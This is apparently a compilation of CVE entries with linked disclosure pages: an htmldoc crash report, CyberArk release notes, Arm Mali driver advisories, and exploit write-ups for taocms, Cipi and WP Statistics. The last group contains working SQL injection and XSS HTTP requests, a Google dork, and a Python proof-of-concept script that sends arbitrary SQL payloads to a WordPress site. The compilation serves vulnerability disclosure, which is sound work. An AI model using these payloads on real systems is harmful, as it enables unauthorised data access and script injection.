Null pointer dereference in the htmldoc v1.9.11 and before may allow attackers to execute arbitrary code and cause a denial of service via a crafted html file.

While fuzzing htmldoc I found a segmentation fault in the copy\_image() function, in epub.cxx:1221

testcase:(zipped so GitHub accepts it)  
crash01.html.zip

reproduced by running:

    htmldoc -f demo.epub  crash01.html 
    

htmldoc Version v1.9.11 git \[master 0f9d20\]  
tested on:

OS :Ubuntu 20.04.1 LTS  
kernel: 5.4.0-53-generic  
compiler: clang version 10.0.0-4ubuntu1  
Target: x86\_64-pc-linux-gnu

OS : macOS Catalina 10.15.5(19F101) MacBook Pro (Retina, 13-inch, Early 2015)  
compiler: Apple clang version 11.0.0 (clang-1100.0.33.17)

Install from snap or download mac dmg don't crash for this testcase.

*   addresssanitizer

    ==3252595==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000042fc30 bp 0x7ffe6ab48d00 sp 0x7ffe6ab484a0 T0)
    ==3252595==The signal is caused by a READ memory access.
    ==3252595==Hint: address points to the zero page.
        #0 0x42fc30 in strcmp (/home/chiba/check_crash/htmldoc/htmldoc/htmldoc+0x42fc30)
        #1 0x7f70ce1fd7c7 in bsearch /build/glibc-ZN95T4/glibc-2.31/stdlib/../bits/stdlib-bsearch.h:33:23
        #2 0x4c81b0 in copy_image(_zipc_s*, char const*) /home/chiba/check_crash/htmldoc/htmldoc/epub.cxx:1221:25
        #3 0x4c8434 in copy_images(_zipc_s*, tree_str*) /home/chiba/check_crash/htmldoc/htmldoc/epub.cxx:1288:11
        #4 0x4c71c5 in epub_export /home/chiba/check_crash/htmldoc/htmldoc/epub.cxx:211:13
        #5 0x4d0f13 in main /home/chiba/check_crash/htmldoc/htmldoc/htmldoc.cxx:1291:3
        #6 0x7f70ce1dd0b2 in __libc_start_main /build/glibc-ZN95T4/glibc-2.31/csu/../csu/libc-start.c:308:16
        #7 0x41c5fd in _start (/home/chiba/check_crash/htmldoc/htmldoc/htmldoc+0x41c5fd)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV (/home/chiba/check_crash/htmldoc/htmldoc/htmldoc+0x42fc30) in strcmp
    ==3252595==ABORTING
    

*   gdb

    ─[ DISASM ]─
     ► 0x7ffff7de1ed7 <__strcmp_avx2+887>    vmovdqu ymm1, ymmword ptr [rdi + rdx]
       0x7ffff7de1edc <__strcmp_avx2+892>    vpcmpeqb ymm0, ymm1, ymmword ptr [rsi + rdx]
       0x7ffff7de1ee1 <__strcmp_avx2+897>    vpminub ymm0, ymm0, ymm1
       0x7ffff7de1ee5 <__strcmp_avx2+901>    vpcmpeqb ymm0, ymm0, ymm7
       0x7ffff7de1ee9 <__strcmp_avx2+905>    vpmovmskb ecx, ymm0
       0x7ffff7de1eed <__strcmp_avx2+909>    test   ecx, ecx
       0x7ffff7de1eef <__strcmp_avx2+911>    jne    __strcmp_avx2+848 <__strcmp_avx2+848>
        ↓
       0x7ffff7de1eb0 <__strcmp_avx2+848>    add    rdi, rdx
       0x7ffff7de1eb3 <__strcmp_avx2+851>    add    rsi, rdx
       0x7ffff7de1eb6 <__strcmp_avx2+854>    tzcnt  edx, ecx
       0x7ffff7de1eba <__strcmp_avx2+858>    movzx  eax, byte ptr [rdi + rdx]
    ─[ STACK ]──
    00:0000│ rsp  0x7fffffffd948 —▸ 0x7ffff7ca27c8 (bsearch+88) ◂— test   eax, eax
    01:0008│      0x7fffffffd950 —▸ 0x555555aa6bc0 —▸ 0x555555aa6fd0 —▸ 0x7ffff7e47000 (main_arena+1152) —▸ 0x7ffff7e46ff0 (main_arena+1136) ◂— ...
    02:0010│      0x7fffffffd958 ◂— 0x8
    03:0018│      0x7fffffffd960 ◂— 0x0
    04:0020│      0x7fffffffd968 —▸ 0x555555aa8bf0 —▸ 0x555555aa8af0 —▸ 0x555555aa7f40 —▸ 0x555555aa65c0 ◂— ...
    05:0028│      0x7fffffffd970 —▸ 0x555555aa9200 —▸ 0x555555aa6340 ◂— 0x5555fbad2480
    06:0030│      0x7fffffffd978 —▸ 0x555555aa8fe0 ◂— 0x616d693a61746164 ('data:ima')
    07:0038│      0x7fffffffd980 —▸ 0x5555555cd04b ◂— 0x22263e3c00435253 /* 'SRC' */
    
    pwndbg> bt
    #0  __strcmp_avx2 () at ../sysdeps/x86_64/multiarch/strcmp-avx2.S:736
    #1  0x00007ffff7ca27c8 in __GI_bsearch (__key=0x7fffffffd9a0, __base=0x555555aa6bc0, __nmemb=<optimized out>, __size=8, __compar=0x55555555d609 <compare_images(char**, char**)>) at ../bits/stdlib-bsearch.h:33
    #2  0x000055555555d6ed in copy_image (zipc=zipc@entry=0x555555aa9200, filename=filename@entry=0x555555aa8fe0 "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQAQMAAAAlPW0iAAA,BlBMVEUAAAD///+l2Z/dAAAAM0lEQVR4nGP4/5/h/1+G/58ZDrAz3D/McH8yw83NDDeNGe4Ug9CLzwz3gVLMDA/A6P9/#FGGF\207jOXZtQAAAAAElFTkSuQmCC") at epub.cxx:1235
    #3  0x000055555555d81c in copy_images (zipc=zipc@entry=0x555555aa9200, t=0x555555aa8bf0, t@entry=0x555555aa65c0) at epub.cxx:1288
    #4  0x000055555555e813 in epub_export (document=0x555555aa65c0, toc=0x555555aa6760) at epub.cxx:211
    #5  0x000055555555d448 in main (argc=<optimized out>, argc@entry=4, argv=argv@entry=0x7fffffffe4e8) at htmldoc.cxx:1291
    #6  0x00007ffff7c820b3 in __libc_start_main (main=0x55555555af20 <main(int, char**)>, argc=4, argv=0x7fffffffe4e8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe4d8) at ../csu/libc-start.c:308
    #7  0x000055555555d54e in _start () at htmldoc.cxx:1315
    
    

The bug locate in epub.cxx:1221 compare\_images. The arguments of compare\_images didn't checked so strcmp() lead a segfault due to to null pointer.

CVE-2021-26948: SEGV on unknown address 0x000000000000   · Issue #410 · michaelrsweet/htmldoc

CyberArk Identity versions up to and including 22.1 in the 'StartAuthentication' resource, exposes the response header 'X-CFY-TX-TM'. In certain configurations, that response header contains different, predictable value ranges which can be used to determine whether a user exists in the tenant.

Release 22.2 (available February 25, 2022) introduces the following changes.

Refer to CyberArk Identity Release Notes - Previous Versions for changes in previous releases.

**New features**

The following new features are available starting in 22.2.

 

Feature

Description

**Workforce Password Management**

Inline Password Generator for change password flow

The CyberArk Identity Browser Extension is enhanced to automatically detect if the user is on a websites’ change password screen, autofill in the existing password field and with a click of the icon (displayed in the image below) generate a strong password inline to fill in the New Password and Confirm Password fields. Upon save, the browser extension captures and offers to save the updated password in cloud or self-hosted vault. This feature allows for seamless user experience of changing their business account passwords and avoid any potential password related security vulnerabilities.

![](https://docs.cyberark.com/Product-Doc/OnlineHelp/Idaptive/Latest/en/Content/ReleaseNotes/images/GeneratePassword_RNimage_364x349.png)

Refer to Update passwords with the Password Generator for more information.

**Improvements and behavior changes**

This release includes the following product improvement.

 

Improvement

Description

**CyberArk Identity mobile apps**

Android CyberArk Identity mobile app support changes

The policy setting to Encrypt internal onboard storage (Endpoint policies > Common settings > mobile settings > common > Encrypt internal onboard storage) is removed. CyberArk removed this policy setting because encrypting internal storage is the default behavior starting with Android 5. You cannot enroll Android 4.4.4 and older devices as the policy setting is removed.

**Early access features**

Early access features are fully-supported features made available on a case-by-case basis by request. Early access features might see more frequent updates compared to GA features.

Contact your account representative to enable early access features.

The following table describes features that are currently in an early access state.

  

Feature

Description

Initial release version

**Authentication**

New Authentication Widget Builder

This feature enables you to create a widget and visualize the preview of the widget before using it.

22.1

Progressive migration of passwords using code plugin

This feature enables you to progressively migrate hashed passwords from their legacy stores to CyberArk Identity by providing an inline legacy authentication hook into the CyberArk Identity authentication process.

21.12

**User interface**

Updated design in Application tile

The design is updated for the app tiles. A new Shared icon has been introduced in the app tile. You can view this icon on the bottom right of the app tile. You can view all other icons on the bottom right of the tile except the New and Error icon.

![](https://docs.cyberark.com/Product-Doc/OnlineHelp/Idaptive/Latest/en/Content/ReleaseNotes/images/New_apptile_UI_446x390.png)

22.2

Enhanced interface in Applications

This enhancement allows you to customize tabs in Applications based on your requirements. You can perform the following actions in the User Portal:

*   Add tabs
    
*   Delete tabs
    
*   Re-order tabs
    
*   Drag and drop apps from one tab to another tab
    

A new drop-down has been introduced, which allows you to sort all applications.

![](https://docs.cyberark.com/Product-Doc/OnlineHelp/Idaptive/Latest/en/Content/ReleaseNotes/images/Allappstabs_RNimage_618x314.png)

22.2

**Android mobile application**

Support for push notifications on the Android mobile app for users in China

This feature enables users who don't have access to Google services, like users in China, to explicitly fetch the push notifications and policy updates sent by CyberArk Identity.

Contact your CyberArk account representative to enable this feature if you have users without access to Google services.

Refer to Download the CyberArk Identity mobile app for Android and CyberArk Identity-SDK for-Android for more information.

21.11

**Endpoints**

Windows and Mac Device Trust

The CyberArk IdentityWindows Device Trust and Mac Device Trust prevent untrusted computers from accessing the CyberArk Identity portals or web applications using authentication certificates as a conditional access mechanism. This provides additional device trust to identity and access policies.

The Windows Device Trust is available for AD-joined devices and users must first be validated using IWA authentication. The Windows Device Trust is available in the Admin Portal > Downloads.

The CyberArk IdentityMac Device Trust is available for AD-joined devices and non AD-joined devices, and is deployed with Jamf Pro.

Additional enhancements include:

*   New functionality (Revoke, Issue, Renew, and Lifetime ) has been added for certificate management for Windows Cloud Agent and Windows Device Trust. This is available in the Admin Portal > Settings > Endpoints, select an endpoint then go to the Certificates tab.
    
*   Integrations in the Admin Portal > Settings > Endpoints has been renamed to Device Trust.
    

Refer to CyberArk Identity Mac Device Trust and CyberArk Identity Windows Device Trust for more information.

Mac - 21.9

Windows - 21.5

**New Single Sign-On templates**

New Single Sign-On (SSO) application templates are added to the CyberArk Identity Web App Catalog on a regular basis, independent of the product release schedule.

Refer to Recent SSO application templates for a list of recently added templates.

**Component versions**

Refer to the following table for a list of component versions in the latest release:

 

Component

Version

CyberArk Identity

22.2.196

Windows Cloud Agent

22.1.289

Windows Device Trust

22.2.196

Mac Cloud Agent

22.2.196

Mac Device Trust

22.2.196

Android CyberArk Identity mobile app

22.2.106

iOS CyberArk Identity mobile app

22.2.105

Windows CyberArk Authenticator

22.2.196

Mac CyberArk Authenticator

22.2.196

Browser Extensions

22.2.3

Connector

22.2.196

**Browser support**

This version of CyberArk Identity has been tested with the following browsers:

 

Browser

Version

Internet Explorer

Version 11 on Windows 2008 server, Windows 2012 server, Windows 7, and Windows 8

Microsoft Edge

latest version available at release

Mozilla Firefox

latest version available at release

Google Chrome

latest version available at release

Apple Safari

11

For silent authentication to work correctly, some web browsers need additional configuration (see Configure browsers for silent authentication) or a browser extension (see Manage credentials with Workforce Password Management).

On devices, the CyberArk Identity mobile app opens the web applications in the native browser unless that application requires a browser extension to provide single sign-on. For these applications only, the CyberArk Identity mobile app opens the application in its built-in browser.

**CyberArk Identity Browser Extension support**

The Browser Extension for Internet Explorer and Safari is deprecated. If your users use those browsers with a previous version of the Browser Extension and you want them to continue to do so, you should restrict updates to the Browser Extension.

Users restricted to old versions of the Browser Extension will not benefit from updates and new features. Refer to Restrict CyberArk Identity Browser Extension updates for more information.

Computers must meet the following requirements to install the Browser Extension.

*   Microsoft .NET Framework 4.6.2 or later
*   Microsoft Installer 3.1 or later

In addition, browser support for the Browser Extension features is indicated in the following table.

   

Chrome  
(latest available at release)

Firefox  
(latest available at release)

Edge

Form filling

Yes

Yes

Yes

App capture

Not supported

Yes

Not supported

Land and Catch

Yes

Yes

Yes

App Launch

Yes

Yes

Yes

**Device support**

If you are using CyberArk Identity for mobile device management and authentication, it supports enrolling the following devices and computers using the cloud agents.

The purpose of the cloud agent is to enforce authentication profiles; it’s only active during authentication. Unlike Anti-Virus and Endpoint Detection and Response agents, the CyberArk cloud agents are not listening to system events or otherwise consuming endpoint resources after the user logs in.

 

Operating System

Versions supported

Windows

10, Server 2016, Server 2019

Desktop Experience is required for Windows servers.

macOS

10.13, 10.14, 10.15, 11, 12

iOS

11.x and later

iPadOS

13.x and later

watchOS

5.x and later

Android

8.x and later

**Language support**

Foreign language support is provided for the following components:

*   CyberArk Identity User Portal help -- Japanese only
*   User Portal text strings.
*   Admin Portal text strings

Not all of the languages listed below are available for the Admin Portal text strings.

Administrators can select the language in which the user portal texts and CyberArk Identity system messages are displayed. The default setting, (--), is equivalent to not setting a language. In this case, the user's browser language selection will be used. However, if users configure their own language selection, then that language takes precedence. For example, if you set the language to French in the Admin Portal and a user sets the language to Vietnamese in the User Portal, then Vietnamese is used for that user. Users can specify their language selection in User Portal > Account \> Personal Profile > Language drop-down list.

To configure the language option in the Admin Portal

1.  Log-in to the Admin Portal.
2.  Click Access \> Policies \> Select the relevant policy.
3.  Click User Security Policies > User Account Settings.
4.  Select the default language in the Default Language drop-down list.
5.  Click Save.

In this release, translations are provided for the following languages:

*   Arabic
*   Brazilian Portuguese
*   Chinese—Simplified and Traditional
*   Dutch
*   French
*   German
*   Italian
*   Japanese
*   Korean
*   Portuguese
*   Russian
*   Serbian
*   Spanish
*   Swedish
*   Thai
*   Vietnamese

Additional languages are being added over time—see the Release Notes for the most recent additions.

**Known issues**

 

Issue

Workaround

**General platform**

When users click Reload Rights in the CyberArk Identity User Portal, they receive the error You are not authorized to perform this operation. Please contact your IT helpdesk.

Users can ignore this error. It's an error with the UI; Administrative Rights reload as expected.

The UI issue will be addressed in an upcoming hotfix.

When you create a Role and add members before saving the Role, the members are not saved.

Create and save the Role, then add members to the Role and save it again.

**Windows Cloud Agent**

With RDP (v 6.0+), a user cannot RDP to the endpoint/server with the Windows Cloud Agent using a CyberArk Cloud Directoryuser. This is because the network credential validation is done on the client side first, before establishing the remote desktop connection.

https://docs.microsoft.com/en-au/troubleshoot/windows-server/remote/remote-desktop-connection-6-prompts-credentials

**Mac Cloud Agent**

The Mac Cloud Agent installer shows the Gatekeeper warning the first time it is installed on a device.

1.  Go to System Preferences > Security & Privacy > General, then click Open Anyway.
    
    ![](https://docs.cyberark.com/Product-Doc/OnlineHelp/Idaptive/Latest/en/Content/ReleaseNotes/images/GatekeeperBypass.png)
    
2.  Click Open on the warning screen that appears.
    
    After making these changes, the Gatekeeper warning will not display again for the Mac Cloud Agent on that device for the logged in user.
    

The MFA login screen shows “Phone Call” more than once if user has multiple phone numbers configured.

None

The Mac Cloud Agent cannot be updated from the UI.

WorkAround: Go to the User Portal or the Admin Portal to download the latest agent.

Reopen the Mac Cloud Agent and note the agent is updated to the latest version.

Self-service account unlock is not currently supported.

None

User may not able to see the device location.

Go to user policy Endpoint Policies > Common Settings > Mobile Settings > Restriction Settings, then under Report mobile device location select Force for Permit administrator to see device location.Then unenroll the user and enroll again.

Mac login MFA options show FIDO2 and Radius if they were configured in the authentication profile; however, these MFA challenges are currently not supported.

Always make sure authentication challenges configured in the authentication profile are available to your users and configured for each user.

The local account can get out of sync with the matching account in the directory source after the password change, resulting in a denied login.

Log in to a local admin account and set the local password of the impacted user to the same password as the directory source through System Preferences > Users or through the dscl command line.

When creating an authentication profile for Mac MFA, password must be the first factor (Challenge 1).

None

A user might get removed from the FileVault boot screen if they changed their password without entering their previous password in the Keychain Sync dialog on 10.14.3+ macOS devices.

To avoid this issue, users should log out after changing their password in the User Portal. When they log back in, click Yes at the Keychain Sync prompt and enter their previous password to sync their keychain and FileVault password.

Apple Watch unlock is not compatible with the MFA lock screen policy

Disable the MFA lock screen policy for Apple Watch users in the Admin Portal.

The CyberArk Menu Item is not removed from the UI after unenrolling until the next login or restart.

You might receive a certificate error during munkiimport after tenant migration.

Workaround: Re-enroll the Mac

The Apple Device Enrollment Program (DEP) needs to be configured explicitly to work with the 19.6 Mac Cloud Agent. Please contact support if you plan to use DEP.

None

**Mobile applications**

If the iPhone app (or the push authenticator) is locked using biometric or pin, then Apple Watch approval shows an error message.

None

Users can sign in to the Apple watch only after the first notification is delivered to the watch.

None

CVE-2022-22700: CyberArk Identity Release Notes

An Arm product family through 2022-01-03 has an Exposed Dangerous Method or Function.

**Sorry, your browser is not supported. We recommend upgrading your browser. We have done our best to make all the documentation and resources available on old versions of Internet Explorer, but vector image support and the layout may not be optimal. Technical documentation is available as a PDF Download.**

**Title**

Mali GPU Kernel Driver may elevate CPU RO pages to writable

**CVE** 

CVE-2022-22706  

**Date of issue**

6th January 2022  

**Affects**

Midgard GPU Kernel Driver: All versions from r26p0 – r31p0  
Bifrost GPU Kernel Driver: All versions from r0p0 – r35p0  
Valhall GPU Kernel Driver: All versions from r19p0 – r35p0

**Impact**

A non-privileged user can get a write access to read-only memory pages.

**Resolution**

This issue is fixed in Bifrost and Valhall GPU Kernel Driver r36p0. It will be fixed in future Midgard release. Users are recommended to upgrade if they are impacted by this issue.  

**Credit**

n/a

**Title**

Mali  GPU Kernel Driver elevates CPU RO pages to writable

**CVE** 

CVE-2021-44828  

**Date of issue**

11th December 2021  

**Affects**

Midgard GPU Kernel Driver: All versions from r26p0 – r30p0  
Bifrost   GPU Kernel Driver: All versions from r0p0 – r34p0  
Valhall GPU Kernel Driver: All versions from r19p0 - r34p0

**Impact**

A non-privileged user can get a write access to read-only memory, and may be able to gain root privilege, corrupt memory and modify the memory of other processes.

**Resolution**

This issue is fixed in Bifrost and Valhall GPU Kernel Driver r35p0. It will be fixed in future Midgard release. Users are recommended to upgrade if they are impacted by this issue.  

**Credit**

n/a

**Title**

Mali  GPU Kernel Driver allows improper operations on GPU memory

**CVE** 

CVE-2021-28663  

**Date of issue**

18th March 2021  

**Affects**

Midgard GPU Kernel Driver: All versions from r4p0 – r30p0  
Bifrost   GPU Kernel Driver: All versions from r0p0 – r28p0  
Valhall GPU Kernel Driver: All versions from r19p0 - r28p0

**Impact**

A non-privileged user can make improper operations on GPU memory to enter into a use-after-free scenario and may be able to gain root privilege, and/or disclose information.

**Resolution**

This issue is fixed in Bifrost and Valhall GPU Kernel Driver r29p0. It will be fixed in future Midgard release. Users are recommended to upgrade if they are impacted by this issue.  

**Credit**

n/a

**Title**

Mali GPU Kernel Driver elevates CPU RO pages to writable

**CVE** 

CVE-2021-28664  

**Date of issue**

18th March 2021  

**Affects**

Midgard GPU Kernel Driver: All versions from r8p0 – r30p0  
Bifrost GPU Kernel Driver: All versions from r0p0 – r28p0  
Valhall GPU Kernel Driver: All versions from r19p0 - r28p0

**Impact**

A non-privileged user can get a write access to read-only memory, and may be able to gain root privilege, corrupt memory and modify the memory of other processes.

**Resolution**

This issue is fixed in Bifrost and Valhall GPU Kernel Driver r29p0. It will be fixed in future Midgard release. Users are recommended to upgrade if they are impacted by this issue.

**Credit**

n/a

**Title**

Mali GPU Kernel Driver allows improper operations on GPU memory

**CVE**

CVE-2021-29256

**Date of issue**

26th March 2021

**Affects**

Midgard GPU Kernel Driver: All versions from r28p0 – r30p0  
Bifrost GPU Kernel Driver: All versions from r16p0 – r29p0  
Valhall GPU Kernel Driver: All versions from r19p0 - r29p0

**Impact**

A non-privileged User can make improper operations on GPU memory to gain access to already freed memory and may be able to gain root privilege, and/or disclose information.

**Resolution**

This issue is fixed in Bifrost and Valhall GPU Kernel Driver r30p0. It will be fixed in future Midgard release. Users are recommended to upgrade if they are impacted by this issue.

**Credit**

Thanks to Brice Berna, of the Apple Media Products RedTeam for reporting this vulnerability.

CVE-2022-22706: Arm Security Updates | Mali GPU Driver Vulnerabilities – Arm Developer

A stored cross-site scripting (XSS) vulnerability in the admin interface in Element-IT HTTP Commander 7.0.0 allows unauthenticated users to get admin access by injecting a malicious script in the User-Agent field.

CVE-2022-24573: Element-IT software products news

An issue was discovered in taocms 3.0.2. This is a SQL blind injection that can obtain database data through the Comment Update field.

    POST /admin/admin.php HTTP/1.1
    Host: taocms.test
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://taocms.test/admin/admin.php?action=comment&ctrl=lists
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=q6dpqahlf85bhelm9luc2i6jp3;XDEBUG_SESSION=PHPSTORM
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 56
    
    action=comment&id=5)and(sleep(10))--+&ctrl=update&name=a

CVE-2022-23387: There is SQL blind injection at "Comment Update" · Issue #23 · taogogo/taocms

There is a SQL injection vulnerability in the background of taocms 3.0.2 in parameter id:action=admin&id=2&ctrl=edit.

![20220116015744](https://user-images.githubusercontent.com/46486374/149633033-32c2dfd1-bc79-46a1-96c8-a05e1873985c.jpg)

![20220116015609](https://user-images.githubusercontent.com/46486374/149633040-9d78fd1a-3df2-4c0b-bc2b-71ea3aa5727e.jpg)

    GET /admin/admin.php?action=admin&id=2+and(sleep(5))--+&ctrl=edit HTTP/1.1
    Host: taocms.test
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://taocms.test/admin/admin.php?action=admin&ctrl=lists
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=aa3a5livo36mssl5dqhmf5dc62;XDEBUG_SESSION=PHPSTORM
    Connection: close
    

![20220116020627](https://user-images.githubusercontent.com/46486374/149633051-7e0a3a1d-84e9-43d4-a47a-a0d587a13b0c.jpg)  
![image](https://user-images.githubusercontent.com/46486374/149645874-a658cffe-7534-4efd-b92a-32c17a433a4e.png)

admin/admin.php  
![20220116015910](https://user-images.githubusercontent.com/46486374/149633072-7ada75c3-ae64-49da-b721-e6259a4bcc51.jpg)

include/Model/Admin.php::edit  
![20220116015937](https://user-images.githubusercontent.com/46486374/149633100-66c4a4bd-7b97-418c-a846-2b8a3513876d.jpg)

include/Db/Mysql.php::getlist  
![20220116020018](https://user-images.githubusercontent.com/46486374/149633117-5ecd1062-3ea5-472f-ad1b-524d6b6a4a88.jpg)

include/Db/Mysql.php::query  
![20220116020037](https://user-images.githubusercontent.com/46486374/149633125-1e4e24d9-d551-4a50-b9ca-0c4c314ffbb6.jpg)

CVE-2022-23380: There is SQL blind injection at "Admin Edit" · Issue #16 · taogogo/taocms

Cipi 3.1.15 allows Add Server stored XSS via the /api/servers name field.

    # Exploit Title: Cipi Control Panel 3.1.15 - Stored Cross-Site Scripting (XSS) (Authenticated)
    # Date: 24.02.2022
    # Exploit Author: Fikrat Ghuliev (Ghuliev)
    # Vendor Homepage: https://cipi.sh/ <https://www.aapanel.com/>
    # Software Link: https://cipi.sh/ <https://www.aapanel.com/>
    # Version: 3.1.15
    # Tested on: Ubuntu
    
    When the user wants to add a new server on the "Server" panel, in "name"
    parameter has not had any filtration.
    
    POST /api/servers HTTP/1.1
    Host: IP
    Content-Length: 102
    Accept: application/json
    X-Requested-With: XMLHttpRequest
    Authorization: Bearer
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
    (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
    Content-Type: application/json
    Origin: http://IP
    Referer: http://IP/servers
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    
    {
    "name":"\"><script>alert(1337)</script>",
    "ip":"10.10.10.10",
    "provider":"local",
    "location":"xss test"
    }

CVE-2022-26332: Offensive Security’s Exploit Database Archive

The WP Statistics WordPress plugin is vulnerable to SQL Injection due to insufficient escaping and parameterization of the current_page_id parameter found in the ~/includes/class-wp-statistics-hits.php file which allows attackers without authentication to inject arbitrary SQL queries to obtain sensitive information, in versions up to and including 13.1.5.

WordPress Plugin WP Statistics <= 13.1.5 - Multiple Unauthenticated SQL Injection vulnerabilities

Exploit Title

WordPress Plugin WP Statistics <= 13.1.5 - Multiple Unauthenticated SQL Injection vulnerabilities

Exploit Author

Muhammad Zeeshan (Xib3rR4dAr)

Date

February 13, 2022

Plugin Link

WP-Statistics

Plugin Active Installations

600,000+

Version

13.1.5 (Latest)

Tested on

Wordpress 5.9

Vulnerable Endpoint

/wp-json/wp-statistics/v2/hit

Vulnerable File

/wp-content/plugins/wp-statistics/includes/class-wp-statistics-pages.php:225

Vulnerable Parameters

current\_page\_type, current\_page\_id, ip

Google Dork

inurl:/wp-content/plugins/wp-statistics

CVE

CVE-2022-0651, CVE-2022-25148, CVE-2022-25149

**Description**

Endpoint is vulnerable to Unauthenticated SQL Injections when "Cache Compatibility" is enabled in Wp-Statistics settings.

**Vulnerable Endpoint**: /wp-json/wp-statistics/v2/hit

**Vulnerable Parameters**:

*   current\_page\_id
*   current\_page\_type
*   ip

current_page_id is Integer based SQL Injection while current_page_type and ip are String based SQL Injections.

**Reproduction Steps**

*   On wordpress installation, install latest version of WP-Statistics which is version 13.1.5 as of writing (February 13, 2022) from Wordpress Plugins Repo.
*   After wordpress login, goto WP Statistics > Settings ie /wp-admin/admin.php?page=wps\_settings\_page and enable "Cache Compatibility"
*   Unauthenticatedly, visit any page of target site and from response page get nonce value for wp-statistics and replace _wpnonce in following request:

    /wp-json/wp-statistics/v2/hit?_=11&_wpnonce=935551c012&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip=11.11.11.11&exclusion_match=no&exclusion_reason&ua=Something&track_all=1&timestamp=11&current_page_type=home&current_page_id=sleep(3)&search_query&page_uri=/&user_id=0
    

*   Make the request and SQL injection will trigger making site respond after 3 seconds.

PoCs for other parameters:

    /wp-json/wp-statistics/v2/hit?_=11&_wpnonce=935551c012&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip=11.11.11.11&exclusion_match=no&exclusion_reason&ua=Something&track_all=1&timestamp=11&current_page_type=home&current_page_id=sleep(1)&search_query&page_uri=/&user_id=0
    /wp-json/wp-statistics/v2/hit?_=11&_wpnonce=935551c012&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip=11.11.11.11&exclusion_match=no&exclusion_reason&ua=Something&track_all=1&timestamp=11&current_page_type=home'-sleep(1)-'&current_page_id=0&search_query&page_uri=/&user_id=0
    /wp-json/wp-statistics/v2/hit?_=11&_wpnonce=935551c012&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip='-sleep(1)-'&exclusion_match=no&exclusion_reason&ua=Something&track_all=1&timestamp=11&current_page_type=home&current_page_id=0&search_query&page_uri=/&user_id=0
    

**Vulnerable Code**

wp-statistics/includes/class-wp-statistics-pages.php

225:        $exist = $wpdb\->get\_row("SELECT \`page\_id\` FROM \`" . DB::table('pages') . "\` WHERE \`date\` = '" . TimeZone::getCurrentDate('Y-m-d') . "' " . (array\_key\_exists("search\_query", $current\_page) === true ? "AND \`uri\` = '" . esc\_sql($page\_uri) . "'" : "") . "AND \`type\` = '{$current\_page\['type'\]}' AND \`id\` = {$current\_page\['id'\]}", ARRAY\_A);

wp-statistics/includes/class-wp-statistics-visitor.php

    79:        $visitor = $wpdb->get_row("SELECT * FROM `" . DB::table('visitor') . "` WHERE `last_counter` = '" . ($date === false ? TimeZone::getCurrentDate('Y-m-d') : $date) . "' AND `ip` = '{$ip}'");
    

**Proof of Concept**

import requests, re, json, urllib.parse

wpurl           \=   input('\\nWordPress URL: ')
payload         \=   input('\\nPayload: ')

wp\_session      \=   requests.session()

wp              \=   wp\_session.get(wpurl)
wp\_nonce        \=   re.search(r'\_wpnonce=(.\*?)&wp\_statistics\_hit', wp.text).group(1)

headers         \=   {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 12\_2\_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15"}

payload         \=   urllib.parse.quote\_plus(payload)
exploit         \=   f'/wp-json/wp-statistics/v2/hit?\_=11&\_wpnonce={wp\_nonce}&wp\_statistics\_hit\_rest=&browser=&platform=&version=&referred=&ip=11.11.11.11&exclusion\_match=no&exclusion\_reason&ua=Something&track\_all=1&timestamp=11&current\_page\_type=home&current\_page\_id={payload}&search\_query&page\_uri=/&user\_id=0'
exploit\_url     \=   wpurl+exploit

print(f'\\nSending: {exploit\_url}')

wp              \=   wp\_session.get(exploit\_url, headers\=headers)
data            \=   wp.json()

print("\\nResponse: \\n" + json.dumps(data, sort\_keys\=True, indent\=4))

print(f'\\nTime taken: {wp.elapsed.total\_seconds()}')

**Fix:**

*   Update wp-statistics plugin to version 13.1.6, or newer.

CVE-2022-25148: WordPress Plugin WP Statistics <= 13.1.5 - Multiple Unauthenticated SQL Injection vulnerabilities

The WP Statistics WordPress plugin is vulnerable to Cross-Site Scripting due to insufficient escaping and sanitization of the platform parameter found in the ~/includes/class-wp-statistics-hits.php file which allows attackers to inject arbitrary web scripts onto several pages that execute when site administrators view a sites statistics, in versions up to and including 13.1.5.

WordPress Plugin WP Statistics >= 13.1.5 - Unauthenticated Stored Cross-Site Scripting in platform

Exploit Title

WordPress Plugin WP Statistics >= 13.1.5 - Unauthenticated Stored Cross-Site Scripting

Exploit Author

Muhammad Zeeshan (Xib3rR4dAr)

Date

February 13, 2022

Plugin Link

WP-Statistics

Plugin Active Installations

600,000+

Version

13.1.5 (Latest)

Tested on

Wordpress 5.9

Vulnerable Endpoint

/wp-json/wp-statistics/v2/hit

Vulnerable File

/wp-content/plugins/wp-statistics/includes/class-wp-statistics-hits.php and others

Vulnerable Parameters

platform

Google Dork

inurl:/wp-content/plugins/wp-statistics

CVE

N/A

**Proof of Concept**

